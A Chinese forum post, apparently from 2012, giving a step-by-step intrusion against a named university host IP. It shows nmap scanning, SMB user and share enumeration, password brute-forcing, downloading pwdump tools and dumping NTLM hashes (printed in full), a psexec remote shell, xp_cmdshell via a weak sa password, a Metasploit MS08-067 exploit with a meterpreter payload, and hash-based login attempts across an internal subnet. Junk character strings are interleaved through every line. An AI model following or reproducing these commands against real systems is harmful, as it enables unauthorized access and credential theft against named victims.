广西师范网站http://202.103.242.241/, A* M, r7 S! ~* [, p
8 Z; j) I7 x) t
root@bt:~# nmap -sS -sV 202.103.242.241
* L0 f7 `# r) o+ |" o- @
! K& Q6 {- |- v5 n4 Y" WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
3 `0 K" s0 ]( D0 ]9 l2 y' w, p! }4 z0 L
Nmap scan report for bogon (202.103.242.241)$ ~- m# m. I+ X% p* f$ ?( E
5 U2 K( v2 [$ F, LHost is up (0.00048s latency).
7 O, u! }- j5 @! @+ d0 u! b; ^2 ]0 x# l# I6 ?2 L
Not shown: 993 closed ports
6 w1 X( }) U6 |# f$ L2 T4 K& x4 L* r. M5 P& [& |4 ]
PORT STATE SERVICE VERSION8 P0 e/ j4 w# ~% n7 ?
0 C/ g/ o# L6 Z S- q& d+ l135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
1 v/ Y" B0 [. R" N& i E2 a( x3 S* h& ~" z4 ]9 |5 @
139/tcp open netbios-ssn
/ G# t# T# w/ \" ~3 e* a5 X* X# D
# H/ u/ l: O' F! g* m1 A445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds/ @9 S: O' l0 K8 \
& B4 T/ }1 h9 v# M& Q1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 O4 J5 n( C z- ?2 @3 d! z% |
/ v' J" _; O2 r% K1026/tcp open msrpc Microsoft Windows RPC: o$ x9 F) h- f5 ?& D4 n( S* } a
0 o' q# x! O0 a# r; p3372/tcp open msdtc?
( C% { f [$ S: n: E) a" S7 S6 \9 l# o
3389/tcp open ms-term-serv?
- k3 p- d2 q3 |1 B! x
: e$ q5 I* l" q! T3 i1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :4 E/ x0 m( [) A5 ^% P( m
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
6 P z2 A1 {+ D. s, N o2 g2 o- s. S4 M" ~+ T7 }, v
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
( |4 h- C7 Z8 k9 t, W. }
2 z# B- y" ~; s4 p: S. LSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)3 t/ V' ]' W; y+ a
3 r, }, S% |! m. mSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO- y0 t3 ?- I, C' Y ~" t. B
* U* Y8 W. M* v- k, N: q5 c7 _; E
SF:ptions,6,”hO\n\x000Z”);) e) w4 W! w$ h- P/ b
5 ?/ L' a- ]3 k i, K+ gMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, Y& N; K" c* |9 E; q! |8 p" g& @
* ~3 R( h' R3 Z4 b+ WService Info: OS: Windows
' w4 Q* R/ D% e7 W/ |! B) ^+ {; M/ a6 b' ?
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .9 o1 n1 R6 Q& `+ m$ N
6 Z- s8 `/ X$ h* J3 C! r1 M- NNmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ R; }5 W& o( O
+ \6 h+ _0 y( H1 troot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本) h# P/ r3 `1 v0 G' |' F2 F. X n2 B
/ x8 ]* q% g+ e2 c% R: f8 Q-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
9 a1 y @: y7 T; ~5 Z9 c3 {1 }6 J# a9 d! ~5 N8 H+ i3 m
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse% ?% y6 s8 D3 [- Z: d3 R6 H
8 w. t/ r4 ]- F- w/ I
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse+ S2 V8 _' C2 h* r T* R" h, Z
) i* Z/ T9 x5 K0 Y0 I. i K- P
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse3 K+ \2 [ _7 X6 t2 R+ J* G- }
6 [& v% M3 j( j* t- ], j
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse0 ^1 S" C1 P* P, Z, s
; s) b/ o* F; ~* |" B5 S& ?( V
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse6 W7 |/ W+ o S0 J
7 O# {8 ^, u! z5 {. }1 f5 C-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse3 {* @" G7 A u. t1 N+ g1 L: n" G" S
) S9 o7 K. s8 u H- N# j-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
; g# v% Z5 {# y
( {) r5 k$ z9 s-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse+ h( i6 J% P1 E5 M" |, v
4 J# A' ~2 {1 O4 R6 t8 C6 c
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
: f7 `4 G1 I' I8 s( @" ?9 N- }+ N9 X& w% r6 |. a( }/ C( L
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse4 |7 ~$ u* e* M. B$ ~$ c' q
9 \1 d) N4 c- [
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
% B J& M2 n" w i
: e3 A+ L( y# x% z" g2 f ?9 ` [-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
! C- D: e: I0 n/ G1 b0 l" J, `
) J* }/ w/ h+ r/ R, z3 w-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
/ A5 w) t( l: i1 H' i
9 ?& ~# w2 M& D0 g# |-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse( [% a8 }, N: R$ c2 t2 ?$ W, a
5 o7 c* o( E" B( \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
& S; q$ H5 X+ P+ q7 e- [- c2 {" }! q" h3 K1 S2 }4 y4 i, Q8 S; h
//此乃使用脚本扫描远程机器所存在的账户名
" P' Z9 Z! _% s0 C: S% Q2 ]! u( b9 \5 @
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
- d/ J6 z" L# ?: |- V& j" C0 _( ]* w2 F" G0 P6 E6 I6 j) W
Nmap scan report for bogon (202.103.242.241)
; _; t8 ~7 [% a, q% @' @. h8 F! o1 N8 {$ j+ V5 F! g
Host is up (0.00038s latency).
( h: B, |7 P* z, s6 D3 K; O W4 V! ~7 r
Not shown: 993 closed ports0 M4 V3 a1 j4 w# v
: i- R. r3 [: B: ?5 ]3 F. q2 c* b/ ^4 U
PORT STATE SERVICE" g7 ^) w( S5 Z3 \ O( v5 k
Q& K7 e! {+ C g% F, o, d135/tcp open msrpc
3 ^6 l. s# @- D9 _4 L7 e
7 ^$ W) s! {; ^# h7 B+ T139/tcp open netbios-ssn2 j) d6 t' k2 G# a! n/ [/ E* t* P
, a/ U1 w9 W# s$ A. p/ L3 h445/tcp open microsoft-ds
! W0 e4 U+ D9 l* l* C) i) h) ~6 e/ ?* h9 Q- `4 u5 A" }2 d% U$ ~
1025/tcp open NFS-or-IIS
* C [% u, x+ w- X; ~5 j, b b1 H
% S2 H1 Y6 K$ M1026/tcp open LSA-or-nterm
4 c4 e% ]! S( r9 s
8 n) A5 r3 M% J3372/tcp open msdtc/ B0 |& o% n5 {! s1 e. i
8 R% a: t" j+ ]8 R @
3389/tcp open ms-term-serv
& I+ h1 G* j( w( K: b) c: g4 @; P& c2 [' y3 R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 n. P1 Z- T+ g/ K0 G/ e! K3 V! m
: \( b/ {1 I% J3 U& }% o- I+ x
Host script results:) T+ H5 E; ?; k3 b9 F
; W/ C2 A7 T8 O; F9 C, ]
| smb-enum-users:
: b5 \( \4 w, N( N
& i1 V" S7 J# d) \$ {" h|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果5 _4 k/ K2 h& W7 J
$ O: u0 g/ e& P! w. T7 |$ C
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
9 [, B y7 } J/ G! S: [6 v7 K
0 U. n# |" |( L8 c: Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 5 v8 M3 q8 U; p$ w/ c) S
0 A0 R: U5 w2 d/ b3 \4 x
//查看共享! ]! Y" m( P8 \) r. ]
: ?6 x! T- t+ y- O9 t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST+ _& O5 `' z6 [6 c7 ]
( @) l' Z5 n) [! W, T+ z6 t
Nmap scan report for bogon (202.103.242.241)# T X/ d# p3 ~9 C
! w6 t$ n, f6 x/ K& ~Host is up (0.00035s latency).
9 t7 L& ^ h: M# Q( Q* h$ y# ]( X0 M3 z6 t( K7 e" l" j
Not shown: 993 closed ports
3 s" Z6 |9 q h2 z8 m1 Y4 x( P6 [9 }2 b0 g( O; T, B- f+ r
PORT STATE SERVICE( n3 P: O5 R; |
( V0 Q I9 @0 K8 u% C. H( f135/tcp open msrpc$ s1 M. z0 m9 ~/ j
! \+ @* p8 q F& u( }5 E* L, x# d
139/tcp open netbios-ssn
4 ^+ J& ?' s2 |( B) v% B( D0 Z
4 b: L# W* B) A4 ~445/tcp open microsoft-ds
2 ^. Z1 J) q1 }6 v( L& |2 Q( _0 [+ m& X+ u
1025/tcp open NFS-or-IIS. {, ?# ]7 l9 N/ h
( t: D2 |, ~# X0 W+ f1026/tcp open LSA-or-nterm
3 o2 J7 ]6 Y1 L! O/ ?+ h6 ?$ Z! d$ z; x. a8 d5 B: h# N
3372/tcp open msdtc
& v3 |! W. U/ _
: F! V: E7 _" j; W& x+ Z0 F3389/tcp open ms-term-serv. ]' G+ I; C0 A5 N2 h1 B' O
F6 t. n7 V* U1 I
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 ~& ~7 c, ^, e3 g* a. l) O! i' m
9 P$ ]1 W' J& d* o5 NHost script results:2 C* }$ b8 `" H
3 F" a$ V) k, Q( R4 e0 z' R+ A, i4 _
| smb-enum-shares:2 }* R) q r# R. q+ p
- T p- R7 N0 d6 q- m
| ADMIN$4 r m& ?5 s K: `0 J# b3 I& k
6 h( ]8 B' |' V" K: B- t| Anonymous access: <none>
: x% E5 h# M. j% }9 l5 z9 e- t6 V" p X+ \ ]# R
| C$
; K0 o8 K% ]& o) x x! J4 G# B, M- I( n2 X" x
| Anonymous access: <none>! u, a2 N p8 \" k6 r
9 K+ n3 V. e1 `3 f
| IPC$
3 I# r% X; V; t3 ^- q
1 l1 v6 v Q# _2 V4 J7 ^, r7 I/ g|_ Anonymous access: READ i6 u% `) A7 w. I- ?/ }4 v
9 \: p) E0 V A: v1 V, |6 ]
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds2 N8 k, ]3 z2 p. b$ c
& J7 H1 G) Z# X: i1 y) ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
' @. b' x' I' \& |- ^
) g# A. `# `+ j- p//获取用户密码
! F: f0 M/ C5 ~% I2 F
$ M5 v, l* ~6 S6 } T% }. ]; @Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
1 v- N/ h s5 f Y* N9 d B1 C$ f
/ N# L3 f/ p- j3 tNmap scan report for bogon (202.103.242.2418)2 g( F0 \8 K8 Z* D7 N
. Z% c( L3 J7 C
Host is up (0.00041s latency).; |1 J9 N$ ^. n
- j9 U8 j2 P5 |5 E1 R
Not shown: 993 closed ports% F7 ~; t: G. K6 l- Q% t; g
3 R- a }1 P0 T; q7 Q( ePORT STATE SERVICE
7 Z" h7 J9 e3 A& t. w( z/ M
3 A* R8 S y0 X) X135/tcp open msrpc
) r% m2 o* Z/ S4 `( f/ \" T/ Y
# f3 a- k" n5 F. Q7 I139/tcp open netbios-ssn# S; ]2 [, s+ q5 l9 z/ I) a
9 X" g. |$ p8 L6 X9 Z# Q/ `8 a: P445/tcp open microsoft-ds" v' E- Q: S" B( y& s* w2 ^
/ n( ]+ H, Y' U, B+ N' V- I( W; h8 t
1025/tcp open NFS-or-IIS
) O) G# a- r2 S! f- I/ S- f9 {7 v% q; \! r9 [0 t, [
1026/tcp open LSA-or-nterm
. {* b2 i. ~2 U4 ^: T6 I' |: u/ Y/ H2 l' O/ N8 Z9 s& \
3372/tcp open msdtc5 E+ J4 a% n/ M" b: S9 i, U
! v1 }4 p5 Y4 q$ I/ m S; [
3389/tcp open ms-term-serv
- b' f' A* U, d. t) p
- f" E9 d" o) rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 u+ K& K' f# C0 X
. J- C. I. O1 x5 DHost script results:
0 N1 X: r& @6 C5 c
5 v5 h$ I. T) V7 n- e! N8 || smb-brute:1 D0 N. c% x% k
$ J; R3 i J+ Fadministrator:<blank> => Login was successful3 @9 ?. z4 U# N; o# r
# u, z& g8 e3 } a; [6 |
|_ test:123456 => Login was successful% Q' o& z" o4 m: Y5 G3 P
2 ]) n+ v H% F" N$ z
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% w7 B1 m$ l+ \0 K; N' _# W0 a- ~; [4 ?
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
" P R, y, K: c* Z/ w' ~5 g2 e/ d3 f' C$ {5 O) [6 Q" G
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data4 M5 Y3 N; {- x$ C% N1 d- h
9 Y" |: h. w; k) a1 m
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse, v/ [& J9 W8 R. r) r9 F# n8 M
' B+ E* y- V; L$ U( b2 @# Proot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139; ]# @4 }4 [: t) P
9 [( X% L% |3 ]9 @3 E( u! c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
# e* y" D8 @1 z1 t* I K1 E3 P
+ K, t; s6 w# qNmap scan report for bogon (202.103.242.241)8 j8 D+ w9 O# F1 N
( a4 V/ w& B+ o; p A* V6 ~$ b9 }% E' H
Host is up (0.0012s latency).
9 ?6 p6 ]: O2 t, D2 ]' g+ g) X/ L+ [1 K. v4 d0 Q' q5 V9 R$ M6 ^
PORT STATE SERVICE, r/ v0 o1 |1 u& ?! j6 j7 X% b
) t: z! a3 h; W+ E
135/tcp open msrpc
9 |$ O/ _- T, O3 a9 x( T6 K, S `3 J+ T, b& z( d1 q- n3 U
139/tcp open netbios-ssn0 ?5 i; q' d! u) S, a; v/ v9 L& l
2 a: ~) V1 u5 M# q445/tcp open microsoft-ds
+ F* R2 ^* X6 b* T$ t9 T
. W) O1 k0 d. X \MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' i7 X9 p4 i7 i; u8 D' u/ V0 U
/ h/ j% {' }9 j. q* O1 U' I2 Z; |' HHost script results:
- ^4 E+ u5 k) l% e! u- o
% l+ A$ l2 w5 P( s| smb-pwdump:
, j) W) s1 |& L# r6 y! _# Z
. |. W# Z: O- [8 c" [2 Q1 ^| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************- o% ^4 n9 F6 t0 P! Q; n$ N7 P- I# T
0 q, r* h2 k' A7 i1 v" l| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
5 [/ Z5 o; M/ Q9 f# q7 M$ i/ R8 E0 }) c% d% v0 ~4 T% n$ ~
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ Z% C6 N! k. b a/ E7 r: W4 ^
: e W7 [4 ?3 k+ a: k/ u+ V|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2: d( \+ q& Z3 @1 U: B1 P
! Q: H9 v1 K+ v' N/ v; DNmap done: 1 IP address (1 host up) scanned in 1.85 seconds7 O( A, ^0 E3 @, k& ]5 h0 H3 V
$ W$ O/ ^" U. P6 |9 `, i) g
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell, W& ? {7 e, K. T/ R
8 W; b/ P" i, O-p 123456 -e cmd.exe' [' h' o) e, y; s. e; x5 p
) r. w8 t. r, Y t9 q# W; }: C, B
PsExec v1.55 – Execute processes remotely8 P. H* `( F8 P" g3 @
+ ~. ?( ^* ]* a1 y+ A' K; MCopyright (C) 2001-2004 Mark Russinovich
: \% C2 G+ Y( B$ j# L" A l# Z( U1 @& y( t1 R4 x+ y2 Y
Sysinternals – www.sysinternals.com" r7 ^1 |% d8 W# M0 f
) p2 ]' v2 O' |) }) w ~. K
Microsoft Windows 2000 [Version 5.00.2195]8 e; I; j9 ?7 e& k- N
. ~ n3 J5 m/ L% b) V3 F
(C) 版权所有 1985-2000 Microsoft Corp.
8 U8 A+ }- A. d- X/ A
( E' O2 L7 B2 |0 G; RC:\WINNT\system32>ipconfig
$ t, ~. Z% z: q# t' z w! Z6 a
/ _" r/ ]$ d! a$ RWindows 2000 IP Configuration: D) M! c& t, Z
( j6 z9 A- b/ zEthernet adapter 本地连接:
& e7 E5 h( i# j% i5 A8 q
; k; l( I0 }# K XConnection-specific DNS Suffix . :7 O8 N$ t ?% N# @8 d7 x4 L5 w; S
$ t8 x* J2 H4 v( q EIP Address. . . . . . . . . . . . : 202.103.242.2413 [. r: A7 [+ m. i
G7 x6 Q# G! \# u \+ ^
Subnet Mask . . . . . . . . . . . : 255.255.255.0
& |. `8 S; ?/ V. V, |- D W5 |) [% H; j0 h! S4 J
Default Gateway . . . . . . . . . : 202.103.1.1% t7 H+ e$ a$ Q+ [4 k/ q0 M
. o% f: h, q: @+ j: o
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
' I" S1 h3 y1 Q3 ^% M# v6 \( @, F( s9 @1 f4 k- O1 {& C3 H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞) ~6 J8 [: f( E3 T! X% Z0 p
' x! Q9 X0 b: o1 S6 L! kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
7 ~/ q4 L# o6 d- F2 Q
- j2 z: H, r: q. o" k* _5 V4 INmap scan report for bogon (202.103.242.241)
* y2 o ^ v$ c/ S" e: r$ w# I
- k, b' C' }6 h5 m6 z5 A5 q0 VHost is up (0.00046s latency).
. I' M& P# E9 s2 C) o4 A
) e" q, g! x0 U3 i8 }( ?Not shown: 993 closed ports2 m6 i2 j. y4 u, w) `
% {( u* v* E) @! x0 l
PORT STATE SERVICE1 ?8 P9 r, r- N9 m) O
5 ]+ C, T" u/ H c6 h/ g7 W' G135/tcp open msrpc" H6 V7 J. X$ t7 X5 E7 T) }$ W
- T' L L5 q* n: D e9 N, \
139/tcp open netbios-ssn' l9 o8 N! z5 ~0 @( {) a
! ?9 g% p9 `( j9 W6 ?( e K- B v445/tcp open microsoft-ds, l2 | F. S8 c# f! O$ k
+ o7 K. l. x* v/ k$ n5 W1025/tcp open NFS-or-IIS
l5 s. u" w, v4 n" y4 y: C4 U! G1 q& c
1026/tcp open LSA-or-nterm
: `7 J0 h: m+ Q$ x% i0 `% L& \
2 @( }+ Z5 t/ h7 n6 w* |5 M3372/tcp open msdtc
2 W" P9 j9 Q/ E- ?0 V; u
1 W- b; ]9 a( ]8 E: }3389/tcp open ms-term-serv7 [( m/ B: P3 P; ~
# n$ i- J+ n l% e" L' \- i
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; l( r% p. |) c; K- {0 b
- N% ]9 X: s: H/ H8 s. U7 oHost script results:4 ?& E! x% D$ [$ ^$ M- \) j
' |6 _0 v, q. a$ o
| smb-check-vulns:1 I; s5 x8 u) ~; Z& y* |4 i
: v# b1 w9 y6 @7 }
|_ MS08-067: VULNERABLE
) I+ |7 l, ]4 |. O9 s8 p t. \. q3 m1 v
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
; ]) ^# V4 n1 ?* G# x0 j9 w9 s9 w7 L3 Q3 Z, f, n
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
5 Y5 u( ?) y9 x. o T" v
0 H1 P) t! L/ n' t3 a# Qmsf > search ms08
7 D; q6 [; a- S% K6 b: _
% _" @% R$ b: W9 ~9 y) |msf > use exploit/windows/smb/ms08_067_netapi
" b: f" |3 J5 z7 o# L3 T
, u1 K& `$ e/ t3 n% P1 @( Z. }) zmsf exploit(ms08_067_netapi) > show options% l7 l1 i* t1 N+ D8 g& {
# n/ \- `3 A- @! |; k- Omsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2416 R5 c, n$ t! M+ o& ^7 v3 o9 x
4 s" F( J- _4 T; Z- G8 ?+ z( Qmsf exploit(ms08_067_netapi) > show payloads2 L' A/ G: r9 {4 A; F
4 K8 |9 ?( e c% y; R8 amsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
9 a$ S# ~+ O; ~5 T9 g9 v( ?
0 n0 |* a }1 U1 A1 i d% `msf exploit(ms08_067_netapi) > exploit
8 [( [- _3 Z0 T, J; g$ V, S0 x n) k1 c" J: }
meterpreter >+ ^+ T. G, i8 }2 v7 W
( t/ ~5 w; a9 F+ ?Background session 2? [y/N] (ctrl+z) H1 \& X, @$ P+ u% A' f
( S2 B# J: c% t% `) x i, B/ j9 l7 s5 c0 _
msf exploit(ms08_067_netapi) > sessions -l j, C" g7 q9 F$ ]' q6 c5 G
. V4 ?! e" G- m9 ?root@bt:/usr/local/share/nmap/scripts# vim usernames.txt ]% i- |9 |4 J" C
2 ]) g7 r8 G5 qtest3 C/ _ u: t% C/ ?) x
2 j7 A( k( t' [5 o3 v" w4 _0 Aadministrator3 Q4 j$ R+ p" j3 M
; T; `5 o+ V: k; W
root@bt:/usr/local/share/nmap/scripts# vim password.txt* d0 c1 f; X& X+ R) a
! R6 s. W; X, R5 ^# X; B# a: G44EFCE164AB921CAAAD3B435B51404EE# i1 k% ^+ c+ ^' X
8 B/ d H6 Y. I6 C
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
4 |$ `& A% R4 e0 I/ b% Y* U8 O0 b/ H3 Z$ s% R; T5 R" D& ?1 v
//利用用户名跟获取的hash尝试对整段内网进行登录
9 Q: A) O# j/ M5 L' j+ i5 Z
" j5 c* ]! o5 I3 TNmap scan report for 192.168.1.105. O- c0 ], B) U+ W! X2 b; R; r; e& v6 D
X8 |# H" Q( n6 G
Host is up (0.00088s latency).* p5 Y' A+ ~0 ` Q$ Z
+ R0 h1 L P3 P9 |! e6 B
Not shown: 993 closed ports
% K! A/ ^' e: w0 @8 t4 y) V
3 B6 t g* z; V, r; o8 I# DPORT STATE SERVICE
5 l& V/ W( m" h3 ~8 s T: e/ k1 H: H7 `& Q
135/tcp open msrpc( K; }9 k. Q, n! h, h5 T" m2 d+ |
$ }8 C, _' ]" \# N1 f# o7 {139/tcp open netbios-ssn9 G9 l+ j! i1 L/ \( w8 J/ t. P
5 T& w' n( e$ R7 b! N445/tcp open microsoft-ds _. R7 R& J' o& c n
* \; c/ [' ?" x- R6 ^; g2 L [
1025/tcp open NFS-or-IIS1 {4 h" }/ P: H) k8 A. W( m
8 G( \3 C9 P+ v3 v
1026/tcp open LSA-or-nterm$ o! M1 ]. w* u% G) t+ K$ j+ t$ z, E
# ?' P# W9 E- x+ @7 |! i5 S3372/tcp open msdtc
0 u" O; Y8 t7 d3 U- _2 e
; O0 T5 c2 w4 @ h) V. h1 Q3389/tcp open ms-term-serv0 T5 @9 H3 B% h2 n) o/ o8 l
5 A& ?$ `- c; k- Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 n* e* R% g* h: O( I/ F U, \/ A7 j+ M" W, \) U
Host script results:$ Q7 C9 Z7 ]" b& {
( D# b) q- q1 E9 x" T# o| smb-brute:
( ~3 E: S/ T1 w9 W' e1 n; f
' o, N% t! M s+ z3 Z* U1 o& L|_ administrator:<blank> => Login was successful
6 M. t- s. x; j6 L1 v1 w
6 i c& b( x4 \- Z, h9 S9 \! ?& p攻击成功,一个简单的msf+nmap攻击~~·1 `3 j! D! a, q" R* n; Q& R
$ e$ I1 a% R% N, @. H* Z* i
|
发表于 2012-12-4 12:46:42
收藏
支持
反对